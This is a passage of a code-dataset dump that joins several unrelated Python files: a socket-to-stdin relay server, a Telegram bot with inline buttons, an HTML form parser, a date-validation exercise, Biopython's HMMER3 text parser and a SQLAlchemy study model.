client_address = s.accept()\n            logger.warn('new connection from %s', client_address)\n            connection.setblocking(0)\n            inputs.append(connection)\n\n            # Give the connection a queue for data we want to send\n            message_queues[connection] = Queue.Queue()\n            \n        elif s is sys.stdin:\n            # Relay data from stdin to all clients\n            data = sys.stdin.read(1024)\n            logger.info('sys.stdin: %s', data.strip())\n            if '\x04' in data:\n                logger.warn('got Ctrl+D. Terminating.')\n                raise KeyboardInterrupt\n            for client in inputs:\n                if client is not sys.stdin and client is not server:\n                    message_queues[client].put(data)\n                    # Add output channel for response\n                    if client not in outputs:\n                        outputs.append(client)\n        \n        else:\n            data = s.recv(1024)\n            if data:\n                # A readable client socket has data\n                # Relay data from any client to stdout\n                logger.info('%s: %s', s.getpeername(), data.strip())\n                message_queues[sys.stdout].put(data)\n                if sys.stdout not in outputs:\n                    outputs.append(sys.stdout)\n            \n            else:\n                # Interpret empty result as closed connection\n                logger.warn('closing %s after reading no data', client_address)\n                # Stop listening for input on the connection\n                if s in outputs:\n                    outputs.remove(s)\n                inputs.remove(s)\n                s.close()\n\n                # Remove message queue\n                del message_queues[s]\n\n    # Handle outputs\n    for s in writable:\n        try:\n            next_msg = message_queues[s].get_nowait()\n        except Queue.Empty:\n            # No messages waiting so stop checking for writability.\n            if s is sys.stdout:\n                sys.stdout.flush()\n                logger.debug('output queue for stdout is empty')\n            else:\n                logger.debug('output queue for %s is empty', s.getpeername())\n            outputs.remove(s)\n        else:\n            if s is sys.stdout:\n                logger.debug('writing \"%s\" to stdout' % next_msg)\n                s.write(next_msg)\n            else:\n                logger.debug('sending \"%s\" to %s' % (next_msg, s.getpeername()))\n                s.send(next_msg)\n\n    # Handle \"exceptional conditions\"\n    for s in exceptional:\n        logger.error('handling exceptional condition for %s', s.getpeername())\n        # Stop listening for input on the connection\n        inputs.remove(s)\n        if s in outputs:\n            outputs.remove(s)\n        s.close()\n\n        # Remove message queue\n        del message_queues[s]\n","repo_name":"peterdey/Yun-Linino-NewBridge","sub_path":"newbridge.py","file_name":"newbridge.py","file_ext":"py","file_size_in_byte":6532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45105634204","text":"from config import *\nimport telebot\n# inline
 buttons\nfrom telebot.types import InlineKeyboardMarkup , InlineKeyboardButton # to create the inline keyboard and to define buttons, respectively\nimport requests\n# from bs4 import BeautifulSoup\n\n\n\n\n# instantiate the Telegram bot\nbot = telebot.TeleBot(TELEGRAM_TOKEN)\n\n# responds to the /botones command\n@bot.message_handler(commands=['botones'])\ndef cmd_botones(message):\n    '''Shows a message with inline buttons (attached to the message)'''\n    markup = InlineKeyboardMarkup (row_width=2) # number of buttons per row (3 by default)\n    b1 = InlineKeyboardButton ('TOP Descuentazos', url= 'https://t.me/top_descuentazos')\n    b2 = InlineKeyboardButton ('TOP AMZ', url= 'https://t.me/top_amz')\n    b3 = InlineKeyboardButton ('TOP Todo China', url= 'https://t.me/top_todo_china')\n    b4 = InlineKeyboardButton ('TOP Cupones', url= 'https://t.me/top_cupones')\n    b5 = InlineKeyboardButton ('TOP Ofertas', url= 'https://t.me/frikidelto_chollos')\n    b_cerrar = InlineKeyboardButton('CERRAR',callback_data= 'cerrar')\n    markup.add(b1, b2, b3, b4, b5, b_cerrar)\n    bot.send_message(message.chat.id, 'Mis canales de ofertas👌', reply_markup = markup)\n\n@bot.callback_query_handler(func = lambda x: True )\ndef respuesta_botones_inline(call):\n    '''Handles the actions of the callback_data buttons'''\n    cid = call.from_user.id\n    mid = call.message.id\n    if call.data == 'cerrar':\n        bot.delete_message(cid, mid)\n\n# responds to the /buscar command\n@bot.message_handler(commands=['buscar'])\ndef cmd_buscar(message):\n    '''Runs a Google search and returns a list of results\n    with the structure [[title, url], [title, url], ...]'''\n    texto_buscar = ' '.join(message.text.split()[1:])\n    # if no parameters were passed\n    if not texto_buscar:\n        texto = 'Debes introducir una búsqueda. \\n'\n        texto+= 'Ejemplo: \\n'\n        texto+= f'{message.text} lionelmessi'\n        bot.send_message(message.chat.id, texto, parse_mode ='html')\n        return 1\n    # if a search text was provided\n    else:\n        print(f'Buscando en Google: \"{texto_buscar}\"')\n        url = f'https://www.google.com/search?q={texto_buscar.replace(\" \", \"+\")}&num=100'\n        user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Unique/93.7.1196.97'\n        headers = {'user-agent': user_agent}\n        res = requests.get(url, headers =headers, timeout = 10)\n        if res.status_code != 200:\n            print(f'ERROR al buscar: {res.status_code} {res.reason}')\n            bot.send_message(message.chat.id, 'Se ha producido un error. 
Inténtelo más tarde')\n            return 1\n        else:\n            pass\n            # soup = BeautifulSoup(res.text, 'html.parser')\n            # elementos = soup.find_all('div', class_='g')\n            # lista = []\n            # for elemento in elementos:\n            #     try:\n            #         titulo = elemento.find('h3').text\n            #         url = elemento.find('a').attrs.get('href')\n            #         if not url.startswith('http'):\n            #             url = 'https://google.es'+ url\n            #         if [titulo, url] in lista:\n            #             continue\n            #         lista.append([titulo, url])\n            #     except:\n            #         continue\n            # print(lista)\n\n\n#MAIN ####################\nif __name__=='__main__':\n    print('Iniciando BOT...')\n    # infinite loop that checks for new messages\n    bot.infinity_polling()","repo_name":"kirigarcia/python-example-bot","sub_path":"botones.py","file_name":"botones.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25608600284","text":"# -*- encoding: utf-8 -*-\n\nimport time\nimport logging\n\n\n\n\n\nclass WebForm:\n    soup = None\n    updateQuery = \"\"\n    InsertQuery = \"\"\n\n    InputType = [ \"text\", \"email\", \"submit\", \"radio\", \"checkbox\", \"button\", \"number\", \"date\" ]\n    InputName = [ \"name\" ]\n    InputEmail = [ \"email\" ]\n    InputPhone = [ \"phone\" ]\n    InputDesc = [ \"comment\" ]\n    Elements = [ \"name\", \"email\", \"telephone\", \"phone\", \"comment\" ]\n    excludeType = [ \"password\" ]\n    InputElement = [ \"input\", \"textarea\" ]\n    LastElement = \"\"\n    LabelName = \"\"\n    url_id = 0\n    element_lookup = []\n\n    def __init__(self, soup):\n\n        self.soup = soup  # keep the parsed page so ProcessPage can read it\n        self.log = logging.getLogger(__name__)\n        self.ProcessPage()\n\n\n\n    def ProcessPage(self):\n        processData = []\n        try:\n            forms = self.soup.find_all('form')\n            pdata = 0\n            nform = 0\n\n            for form in forms:\n                nform +=1\n                formElement = form.find_all()\n                nLen = len(formElement)\n                i = 0\n                for tag in formElement:\n                    i +=1\n                    #print \"Form: \" + str(nform) + \" | \"+ str(i) + \"/\" + str(nLen) + \" | \" + tag.name, tag\n                    data = self.ProcessElement(tag)\n                    if len(data) > 0:\n                        data[0] = self.url_id\n                        data[1] = nform\n                        #print \"Data -->\", data\n                        processData.append(data)\n            pdata = len(processData)\n            self.log.info(\"ProcessData ---> \" + str(pdata)+\"|\" +str(processData))\n        except Exception as e:\n            print(e, \"Error while reading Soup.\")\n\n        return processData\n\n    def ProcessElement(self,element):\n        DataValues = []\n        if ( element.name in self.InputElement ) or ( element.name == 'button' ):\n            DataValues = self.GetInputProperties(element)\n        # elif ( element.name == 'button' ):\n        #     DataValues = self.GetButtonProperties(element)\n\n        #Should be executed always after processing element\n        self.RecordLastElement(element)\n        return DataValues\n\n    def GetInputProperties(self, element):\n        self.element_lookup = []\n\n        #print \"Element ----------> \", element\n        attr = element.attrs\n\n        tag_id = self.GetDictKeyValue( attr, 'id')\n        tag_label = self.GetIds( 'label' , self.GetLastLabelName(element))\n        tag_name = self.GetIds( 'name' , self.GetDictKeyValue( attr, 'name'))\n        tag_placeholder = self.GetIds( 'placeholder', self.GetDictKeyValue( attr, 'placeholder'))\n        tag_content = self.GetIds( 'content' , self.GetElementContentName(element))\n\n        tag_type = self.GetDictKeyValue( attr, 'type')\n        tag_value = self.GetDictKeyValue( attr, 'value')\n        element_id = self.GetElementLookupId()\n        #cont_url_id, form, tag_name, tag_id, label_id, name_id, placeholder_id, content_id, type, value, element_id, status\n        return [0, 0, element.name, tag_id, tag_label, tag_name, tag_placeholder, tag_content, tag_type, tag_value, element_id, 'New' ]\n\n    def GetElementLookupId(self):\n        resultId 
= 0\n for id in self.element_lookup:\n if resultId == 0 and id != 0:\n resultId = id\n\n return resultId\n\n def GetIds(self, key, value):\n try:\n resultId = None\n if value != None:\n args = self.Get_argsId(key, value)\n if len(args) > 0: # fix: args is a list; comparing a list to an int raises TypeError on Python 3\n resultId = args[1]\n self.element_lookup.append(args[2])\n return resultId\n except Exception as e:\n self.log.debug(\"error while getting ID\")\n self.log.info(e)\n\n\n def GetDictKeyValue(self, dictAttr, key):\n keys = dictAttr.keys()\n value = None\n if key in keys:\n value = dictAttr[key].strip()\n return value\n\n def RecordLastElement(self, element):\n if ('span' == element.name ) or ( 'div' == element.name ):\n #print \"Escaping: \" + self.LastElement, self.LabelName\n return\n elif 'label' == element.name:\n self.LastElement = element.name\n self.LabelName = self.GetElementContentName(element)\n else:\n #print element.name, self.LastElement + \" | \" + self.LabelName\n self.LastElement = element.name\n self.LabelName = None\n\n def GetLastLabelName(self, element):\n LabelName = None\n #print element.name in self.InputElement, 'label' == self.LastElement\n if ( element.name in self.InputElement ) and ( 'label' == self.LastElement ):\n LabelName = self.LabelName\n #print LabelName\n return LabelName\n\n def GetElementContentName(self, element):\n labelName = \"\" # initialise before the try so the final return cannot hit an unbound local\n try:\n content = element.contents\n for data in content:\n #if isinstance(data, type(data)):\n # the quoted type name below lost its angle-bracketed body to markup stripping;\n # bs4's NavigableString is the most plausible reconstruction for this text-node check\n if str(type(data)) == \"<class 'bs4.element.NavigableString'>\":\n labelName += str(data)\n if labelName == \"\":\n labelName = None\n except Exception as e:\n print(\"connection\", e)\n try:\n print(\"Decoding \", e)\n time.sleep(2)\n self.log.warning(\"%s - Error while building tag content\", e) # fix: warning() was given two bare strings\n except Exception as e:\n self.log.error(\"logging error: %s\", e)\n #print e, \"Error while building tag content\"\n\n return labelName\n\n\n def GetTagInfo(self, tag):\n tagName = tag.name\n tagContent = tag.contents\n tagAttr = tag.attrs\n self.ProcessLastElement(tag)\n\n def Get_argsId(self, key, value):\n results_args = []\n if not (value == ''):\n #value = \"Search\"\n #print \"Value ----> \" + argStr + \" | \" + str(type(value)), value\n\n if ( key == 'label'):\n procedure = \"Get_Lookup_Label_Id\"\n elif ( key == 'name'):\n procedure = \"Get_Lookup_Name_Id\"\n elif ( key == 'content'):\n procedure = \"Get_Lookup_Content_Id\"\n elif ( key == 'placeholder'):\n procedure = \"Get_Lookup_Placeholder_Id\"\n\n # con = self.dbConnection(True)\n # results_args = con.callproc(procedure, [value, 0, 0 ] )\n # self.dbConnect.commit()\n # #print \"Result: \", results_args\n return results_args\n\n\n\n\n\n#### DISCARDED CODE START FROM HERE, NOT IN USE. 
KEPT ONLY FOR REFERENCE\n\n\n\n\n\n def GetPageStrings(self):\n strings = self.soup.strings\n for string in strings:\n if not '\\n' in string:\n print(\"string: \", repr(string))\n\n def SplitElementsfromString(self, elementList):\n SplittedElement = []\n\n for elementString in elementList:\n\n element = str(elementString).split('\\n')\n for e in element:\n SplittedElement.append(e)\n\n return SplittedElement\n\n\n def GetLabelName(self, content):\n label_name = ''\n\n for items in content:\n items = str(items)\n label_name = self.CheckString_InsideList(items.lower(), self.Elements)\n #print \"Label Name: \" + items, label_name\n if label_name:\n #print \"Return: \", label_name\n return label_name\n #break\n return label_name\n\n def CheckString_InsideList(self, DataString, DataList):\n\n for data in DataList:\n #print \"Data: \"+ data, \"DataString: \" + DataString\n #print \"Items: \" + str(type(DataString)),str(DataString)\n\n if data in DataString:\n #print \"Found: \", data\n return data\n\n return ''\n\n\n\n\n\n\n","repo_name":"BizeeGISP/GISPCopy","sub_path":"E2_Form.py","file_name":"E2_Form.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5869684305","text":"\"\"\"\nEjercicio 17c\n\nEscribir funciones que resuelvan los siguientes problemas:\nc) Dada una fecha (dia, mes, año), indicar si es válida o no.\n\"\"\"\n\n\ndef bisiesto(anio):\n if anio % 4:\n return False\n else:\n if anio % 100:\n return True\n else:\n if anio % 400:\n return False\n else:\n return True\n\n\ndef dias_mes(mes, anio):\n if mes in (1, 3, 5, 7, 8, 10, 12):\n return 31\n elif mes in (4, 6, 9, 11):\n return 30\n elif mes == 2:\n if bisiesto(anio):\n return 29\n else:\n return 28\n else:\n return -1\n\n\ndef validar_fecha(dia, mes, anio):\n dm = dias_mes(mes, anio)\n if dm == -1:\n return -1\n if dm < dia:\n return False\n elif mes > 12:\n return False\n else:\n return True\n\n\nprint(validar_fecha(29, 2, 2016), validar_fecha(29, 2, 2017),\n validar_fecha(3, 13, 2016), validar_fecha(5, 6, 1967))\n","repo_name":"mentecatoDev/python","sub_path":"UMDC/03/17c.py","file_name":"17c.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"31858783058","text":"import re\n\nfrom Bio.SearchIO._utils import read_forward\nfrom Bio.SearchIO._model import QueryResult, Hit, HSP, HSPFragment\n\nfrom ._base import _BaseHmmerTextIndexer\n\n__all__ = (\"Hmmer3TextParser\", \"Hmmer3TextIndexer\")\n\n\n# precompile regex patterns for faster processing\n# regex for program name capture\n_RE_PROGRAM = re.compile(r\"^# (\\w*hmm\\w+) :: .*$\")\n# regex for version string capture\n_RE_VERSION = re.compile(r\"# \\w+ ([\\w+\\.]+) .*; http.*$\")\n# regex for option string capture\n_RE_OPT = re.compile(r\"^# (.+):\\s+(.+)$\")\n# regex for parsing query id and length, for parsing\n_QRE_ID_LEN_PTN = r\"^Query:\\s*(.*)\\s+\\[\\w=(\\d+)\\]\"\n_QRE_ID_LEN = re.compile(_QRE_ID_LEN_PTN)\n# regex for hsp validation\n_HRE_VALIDATE = re.compile(r\"score:\\s(-?\\d+\\.?\\d+)\\sbits.*value:\\s(.*)\")\n# regexes for parsing hsp alignment blocks\n_HRE_ANNOT_LINE = re.compile(r\"^(\\s+)(.+)\\s(\\w+)\")\n_HRE_ID_LINE = re.compile(r\"^(\\s+\\S+\\s+[0-9-]+ )(.+?)(\\s+[0-9-]+)\")\n\n\nclass Hmmer3TextParser:\n \"\"\"Parser for the HMMER 3.0 text output.\"\"\"\n\n def __init__(self, handle):\n \"\"\"Initialize the class.\"\"\"\n self.handle = handle\n self.line 
= read_forward(self.handle)\n self._meta = self._parse_preamble()\n\n def __iter__(self):\n \"\"\"Iterate over query results.\"\"\"\n yield from self._parse_qresult()\n\n def _read_until(self, bool_func):\n \"\"\"Read the file handle until the given function returns True (PRIVATE).\"\"\"\n while True:\n if not self.line or bool_func(self.line):\n return\n else:\n self.line = read_forward(self.handle)\n\n def _parse_preamble(self):\n \"\"\"Parse HMMER preamble (lines beginning with '#') (PRIVATE).\"\"\"\n meta = {}\n # bool flag for storing state ~ whether we are parsing the option\n # lines or not\n has_opts = False\n while True:\n # no pound sign means we've left the preamble\n if not self.line.startswith(\"#\"):\n break\n # dashes could either mean we are entering or leaving the options\n # section ~ so it's a switch for the has_opts flag\n elif \"- - -\" in self.line:\n if not has_opts:\n # if flag is false, that means we're entering opts\n # so switch the flag accordingly\n has_opts = True\n else:\n # if flag is true, that means we've reached the end of opts\n # so we can break out of the function\n break\n elif not has_opts:\n # try parsing program\n regx = re.search(_RE_PROGRAM, self.line)\n if regx:\n meta[\"program\"] = regx.group(1)\n # try parsing version\n regx = re.search(_RE_VERSION, self.line)\n if regx:\n meta[\"version\"] = regx.group(1)\n elif has_opts:\n regx = re.search(_RE_OPT, self.line)\n # if target in regx.group(1), then we store the key as target\n if \"target\" in regx.group(1):\n meta[\"target\"] = regx.group(2).strip()\n else:\n meta[regx.group(1)] = regx.group(2)\n\n self.line = read_forward(self.handle)\n\n return meta\n\n def _parse_qresult(self):\n \"\"\"Parse a HMMER3 query block (PRIVATE).\"\"\"\n self._read_until(lambda line: line.startswith(\"Query:\"))\n\n while self.line:\n regx = re.search(_QRE_ID_LEN, self.line)\n\n while not regx:\n self.line = read_forward(self.handle)\n regx = re.search(_QRE_ID_LEN, self.line)\n\n # get query id and length\n qid = regx.group(1).strip()\n # store qresult attributes\n qresult_attrs = {\n \"seq_len\": int(regx.group(2)),\n \"program\": self._meta.get(\"program\"),\n \"version\": self._meta.get(\"version\"),\n \"target\": self._meta.get(\"target\"),\n }\n\n # get description and accession, if they exist\n qdesc = \"\" # placeholder\n while not self.line.startswith(\"Scores for \"):\n self.line = read_forward(self.handle)\n\n if self.line.startswith(\"Accession:\"):\n acc = self.line.strip().split(\" \", 1)[1]\n qresult_attrs[\"accession\"] = acc.strip()\n elif self.line.startswith(\"Description:\"):\n qdesc = self.line.strip().split(\" \", 1)[1].strip()\n qresult_attrs[\"description\"] = qdesc\n\n # parse the query hits\n while self.line and \"//\" not in self.line:\n hit_list = self._parse_hit(qid, qdesc)\n # read through the statistics summary\n # TODO: parse and store this information?\n if self.line.startswith(\"Internal pipeline\"):\n while self.line and \"//\" not in self.line:\n self.line = read_forward(self.handle)\n\n # create qresult, set its attributes and yield\n # not initializing hit_list directly to handle empty hits\n # (i.e. 
need to set its query description manually)\n qresult = QueryResult(id=qid, hits=hit_list)\n for attr, value in qresult_attrs.items():\n setattr(qresult, attr, value)\n yield qresult\n self.line = read_forward(self.handle)\n\n # Skip line beginning with '# Alignment of', which are output\n # when running phmmer with the '-A' flag.\n if self.line.startswith(\"#\"):\n self.line = self.handle.readline()\n\n # HMMER >= 3.1 outputs '[ok]' at the end of all results file,\n # which means we can break the main loop when we see the line\n if \"[ok]\" in self.line:\n break\n\n def _parse_hit(self, qid, qdesc):\n \"\"\"Parse a HMMER3 hit block, beginning with the hit table (PRIVATE).\"\"\"\n # get to the end of the hit table delimiter and read one more line\n self._read_until(lambda line: line.startswith(\" ------- ------ -----\"))\n self.line = read_forward(self.handle)\n\n # assume every hit is in inclusion threshold until the inclusion\n # threshold line is encountered\n is_included = True\n\n # parse the hit table\n hit_attr_list = []\n while True:\n if not self.line:\n return []\n elif self.line.startswith(\" ------ inclusion\"):\n is_included = False\n self.line = read_forward(self.handle)\n # if there are no hits, then there are no hsps\n # so we forward-read until 'Internal pipeline..'\n elif self.line.startswith(\" [No hits detected that satisfy reporting\"):\n while True:\n self.line = read_forward(self.handle)\n if self.line.startswith(\"Internal pipeline\"):\n assert len(hit_attr_list) == 0\n return []\n elif self.line.startswith(\"Domain annotation for each \"):\n hit_list = self._create_hits(hit_attr_list, qid, qdesc)\n return hit_list\n # entering hit results row\n # parse the columns into a list\n row = [x for x in self.line.strip().split(\" \") if x]\n # join the description words if it's >1 word\n if len(row) > 10:\n row[9] = \" \".join(row[9:])\n # if there's no description, set it to an empty string\n elif len(row) < 10:\n row.append(\"\")\n assert len(row) == 10\n # create the hit object\n hit_attrs = {\n \"id\": row[8],\n \"query_id\": qid,\n \"evalue\": float(row[0]),\n \"bitscore\": float(row[1]),\n \"bias\": float(row[2]),\n # row[3:6] is not parsed, since the info is available\n # at the HSP level\n \"domain_exp_num\": float(row[6]),\n \"domain_obs_num\": int(row[7]),\n \"description\": row[9],\n \"is_included\": is_included,\n }\n hit_attr_list.append(hit_attrs)\n\n self.line = read_forward(self.handle)\n\n def _create_hits(self, hit_attrs, qid, qdesc):\n \"\"\"Parse a HMMER3 hsp block, beginning with the hsp table (PRIVATE).\"\"\"\n # read through until the beginning of the hsp block\n self._read_until(\n lambda line: line.startswith(\"Internal pipeline\") or line.startswith(\">>\")\n )\n\n # start parsing the hsp block\n hit_list = []\n while True:\n if self.line.startswith(\"Internal pipeline\"):\n # by this time we should've emptied the hit attr list\n assert len(hit_attrs) == 0\n return hit_list\n assert self.line.startswith(\">>\")\n hid, hdesc = self.line[len(\">> \") :].split(\" \", 1)\n hdesc = hdesc.strip()\n\n # read through the hsp table header and move one more line\n self._read_until(\n lambda line: line.startswith(\" --- ------ ----- --------\")\n or line.startswith(\" [No individual domains\")\n )\n self.line = read_forward(self.handle)\n\n # parse the hsp table for the current hit\n hsp_list = []\n while True:\n # break out of hsp parsing if there are no hits, it's the last hsp\n # or it's the start of a new hit\n if (\n self.line.startswith(\" [No targets 
detected that satisfy\")\n or self.line.startswith(\" [No individual domains\")\n or self.line.startswith(\"Internal pipeline statistics summary:\")\n or self.line.startswith(\" Alignments for each domain:\")\n or self.line.startswith(\">>\")\n ):\n hit_attr = hit_attrs.pop(0)\n hit = Hit(hsp_list)\n for attr, value in hit_attr.items():\n if attr == \"description\":\n cur_val = getattr(hit, attr)\n if cur_val and value and cur_val.startswith(value):\n continue\n setattr(hit, attr, value)\n if not hit:\n hit.query_description = qdesc\n hit_list.append(hit)\n break\n\n parsed = [x for x in self.line.strip().split(\" \") if x]\n assert len(parsed) == 16\n # parsed column order:\n # index, is_included, bitscore, bias, evalue_cond, evalue\n # hmmfrom, hmmto, query_ends, hit_ends, alifrom, alito,\n # envfrom, envto, acc_avg\n frag = HSPFragment(hid, qid)\n # set query and hit descriptions if they are defined / nonempty string\n if qdesc:\n frag.query_description = qdesc\n if hdesc:\n frag.hit_description = hdesc\n # HMMER3 results are always protein\n frag.molecule_type = \"protein\"\n # depending on whether the program is hmmsearch, hmmscan, or phmmer\n # {hmm,ali}{from,to} can either be hit_{from,to} or query_{from,to}\n # for hmmscan, hit is the hmm profile, query is the sequence\n if self._meta.get(\"program\") == \"hmmscan\":\n # adjust 'from' and 'to' coordinates to 0-based ones\n frag.hit_start = int(parsed[6]) - 1\n frag.hit_end = int(parsed[7])\n frag.query_start = int(parsed[9]) - 1\n frag.query_end = int(parsed[10])\n elif self._meta.get(\"program\") in [\"hmmsearch\", \"phmmer\"]:\n # adjust 'from' and 'to' coordinates to 0-based ones\n frag.hit_start = int(parsed[9]) - 1\n frag.hit_end = int(parsed[10])\n frag.query_start = int(parsed[6]) - 1\n frag.query_end = int(parsed[7])\n # strand is always 0, since HMMER now only handles protein\n frag.hit_strand = frag.query_strand = 0\n\n hsp = HSP([frag])\n hsp.domain_index = int(parsed[0])\n hsp.is_included = parsed[1] == \"!\"\n hsp.bitscore = float(parsed[2])\n hsp.bias = float(parsed[3])\n hsp.evalue_cond = float(parsed[4])\n hsp.evalue = float(parsed[5])\n if self._meta.get(\"program\") == \"hmmscan\":\n # adjust 'from' and 'to' coordinates to 0-based ones\n hsp.hit_endtype = parsed[8]\n hsp.query_endtype = parsed[11]\n elif self._meta.get(\"program\") in [\"hmmsearch\", \"phmmer\"]:\n # adjust 'from' and 'to' coordinates to 0-based ones\n hsp.hit_endtype = parsed[11]\n hsp.query_endtype = parsed[8]\n # adjust 'from' and 'to' coordinates to 0-based ones\n hsp.env_start = int(parsed[12]) - 1\n hsp.env_end = int(parsed[13])\n hsp.env_endtype = parsed[14]\n hsp.acc_avg = float(parsed[15])\n\n hsp_list.append(hsp)\n self.line = read_forward(self.handle)\n\n # parse the hsp alignments\n if self.line.startswith(\" Alignments for each domain:\"):\n self._parse_aln_block(hid, hit.hsps)\n\n def _parse_aln_block(self, hid, hsp_list):\n \"\"\"Parse a HMMER3 HSP alignment block (PRIVATE).\"\"\"\n self.line = read_forward(self.handle)\n dom_counter = 0\n while True:\n if self.line.startswith(\">>\") or self.line.startswith(\"Internal pipeline\"):\n return hsp_list\n assert self.line.startswith(\" == domain %i\" % (dom_counter + 1))\n # alias hsp to local var\n # but note that we're still changing the attrs of the actual\n # hsp inside the qresult as we're not creating a copy\n frag = hsp_list[dom_counter][0]\n # XXX: should we validate again here? 
regex is expensive..\n # regx = re.search(_HRE_VALIDATE, self.line)\n # assert hsp.bitscore == float(regx.group(1))\n # assert hsp.evalue_cond == float(regx.group(2))\n hmmseq = \"\"\n aliseq = \"\"\n annot = {}\n self.line = self.handle.readline()\n\n # parse all the alignment blocks in the hsp\n while True:\n regx = None\n\n # check for hit or query line\n # we don't check for the hit or query id specifically\n # to anticipate special cases where query id == hit id\n regx = re.search(_HRE_ID_LINE, self.line)\n if regx:\n # the first hit/query self.line we encounter is the hmmseq\n if len(hmmseq) == len(aliseq):\n hmmseq += regx.group(2)\n # and for subsequent self.lines, len(hmmseq) is either\n # > or == len(aliseq)\n elif len(hmmseq) > len(aliseq):\n aliseq += regx.group(2)\n assert len(hmmseq) >= len(aliseq)\n # check for start of new domain\n elif (\n self.line.startswith(\" == domain\")\n or self.line.startswith(\">>\")\n or self.line.startswith(\"Internal pipeline\")\n ):\n frag.aln_annotation = annot\n if self._meta.get(\"program\") == \"hmmscan\":\n frag.hit = hmmseq\n frag.query = aliseq\n elif self._meta.get(\"program\") in [\"hmmsearch\", \"phmmer\"]:\n frag.hit = aliseq\n frag.query = hmmseq\n dom_counter += 1\n hmmseq = \"\"\n aliseq = \"\"\n annot = {}\n break\n # otherwise check if it's an annotation line and parse it\n # len(hmmseq) is only != len(aliseq) when the cursor is parsing\n # the similarity character. Since we're not parsing that, we\n # check for when the condition is False (i.e. when it's ==)\n elif len(hmmseq) == len(aliseq):\n regx = re.search(_HRE_ANNOT_LINE, self.line)\n if regx:\n annot_name = regx.group(3)\n if annot_name in annot:\n annot[annot_name] += regx.group(2)\n else:\n annot[annot_name] = regx.group(2)\n\n self.line = self.handle.readline()\n\n\nclass Hmmer3TextIndexer(_BaseHmmerTextIndexer):\n \"\"\"Indexer class for HMMER plain text output.\"\"\"\n\n _parser = Hmmer3TextParser\n qresult_start = b\"Query: \"\n qresult_end = b\"//\"\n\n def __iter__(self):\n \"\"\"Iterate over Hmmer3TextIndexer; yields query results' key, offsets, 0.\"\"\"\n handle = self._handle\n handle.seek(0)\n start_offset = handle.tell()\n regex_id = re.compile(_QRE_ID_LEN_PTN.encode())\n\n while True:\n line = read_forward(handle)\n end_offset = handle.tell()\n\n if line.startswith(self.qresult_start):\n regx = re.search(regex_id, line)\n qresult_key = regx.group(1).strip()\n # qresult start offset is the offset of this line\n # (starts with the start mark)\n start_offset = end_offset - len(line)\n elif line.startswith(self.qresult_end):\n yield qresult_key.decode(), start_offset, 0\n start_offset = end_offset\n elif not line:\n break\n\n\n# if not used as a module, run the doctest\nif __name__ == \"__main__\":\n from Bio._utils import run_doctest\n\n run_doctest()\n","repo_name":"biopython/biopython","sub_path":"Bio/SearchIO/HmmerIO/hmmer3_text.py","file_name":"hmmer3_text.py","file_ext":"py","file_size_in_byte":18370,"program_lang":"python","lang":"en","doc_type":"code","stars":3852,"dataset":"github-code","pt":"77"} +{"seq_id":"74177848567","text":"\"\"\" Create the base model of the table study\"\"\"\n# pylint: disable=bad-whitespace, exec-used, eval-used, unused-import\nfrom sqlalchemy import Column\n# Type 'Text' use with extended_db\nfrom sqlalchemy.types import String, Text\n\nfrom sphere.dicmeta.models.core_model import CoreModel\n\n\n# pylint: disable=line-too-long\nclass BaseStudyModel(CoreModel):\n \"\"\" Create study model \"\"\"\n\n KEY = 'studyUID'\n ID = 
'id'\n\n id = Column('study_id', CoreModel.ID_TYPE, primary_key=True)\n studyUID = Column('study_uid', String(64), nullable=False, index=True, unique=True)\n patientID = Column('patient_uid', String(64), nullable=False)\n dateStudy = Column('date_study', String(10))\n\n institutionName = Column('institution_name', String(256))\n accessionNumber = Column('accession_number', String(256))\n protocolName = Column('protocol_name', String(512))\n studyDescription = Column('study_description', String(512))\n\n for attribute, size_value in CoreModel.attributes_extended('study'):\n exec(attribute)\n\n # pylint: disable=no-member\n def dict_data(self, include_none=False):\n \"\"\"\n The dictionary of data\n\n :param include_none: Whether fields whose value is None should be\n included in the result\n :type include_none: bool\n :return: A dictionary\n :rtype: dict\n \"\"\"\n args = {'id': self.id,\n 'patientID': self.patientID,\n 'studyUID': self.studyUID,\n 'dateStudy': self.dateStudy,\n 'institutionName': self.institutionName,\n 'patient_id': self.patient_id,\n 'accessionNumber': self.accessionNumber,\n 'protocolName': self.protocolName,\n 'studyDescription': self.studyDescription}\n\n for field_name in self.extended_fields('study'):\n args[field_name] = getattr(self, field_name) # equivalent to the original eval(\"self.\" + eval(\"field_name\")) chain, without the double eval\n\n return self.add_value_none(include_none, args)\n\n def __repr__(self):\n # the original format string lost its angle-bracketed body to markup stripping;\n # reconstructed here from the four values that were passed to it\n return \"<Study(id='%s', studyUID='%s', patientID='%s', dateStudy='%s')>\" % (self.id, self.studyUID,\n self.patientID, self.dateStudy)\n\n def display(self, data_level=0, file_format='txt', output_console=False,\n csv_text_delimiter=''):\n \"\"\"\n Display or write the data\n\n :param data_level: The level of displaying or writing the data\n\n The possible value:\n\n - ``0`` - key (default)\n - ``1`` - minimal\n - ``2`` - full\n\n :type data_level: int, optional\n :param file_format: The file format\n\n The possible value:\n\n - txt (default)\n - csv\n - json\n\n :type file_format: str, optional\n :param output_console: Display in the console (True | False)\n :type output_console: bool, optional\n :param csv_text_delimiter: Delimiter of csv or txt file\n :type csv_text_delimiter: str, optional\n :return: The concatenated data\n :rtype: str\n \"\"\"\n msg = '' # guard: msg was unbound if an unknown file_format fell through to the print/return at the bottom\n if file_format == 'txt':\n msg, suffix = self.msg_suffix(data_level)\n if data_level > 1:\n msg += suffix+'id\\t\\t\\t: %s' % self.id\n msg += suffix+'studyUID\\t\\t: %s' % self.studyUID\n else:\n msg += suffix+'%s' % self.studyUID\n if data_level > 0:\n msg += suffix+'patientID\\t\\t: %s' % self.patientID\n msg += suffix+'dateStudy\\t\\t: %s' % self.dateStudy\n msg += suffix+'institutionName\\t: %s' % self.institutionName\n if data_level > 1:\n msg += suffix+'patient_id\\t\\t: %s' % self.patient_id\n msg += suffix+'N series\\t\\t: 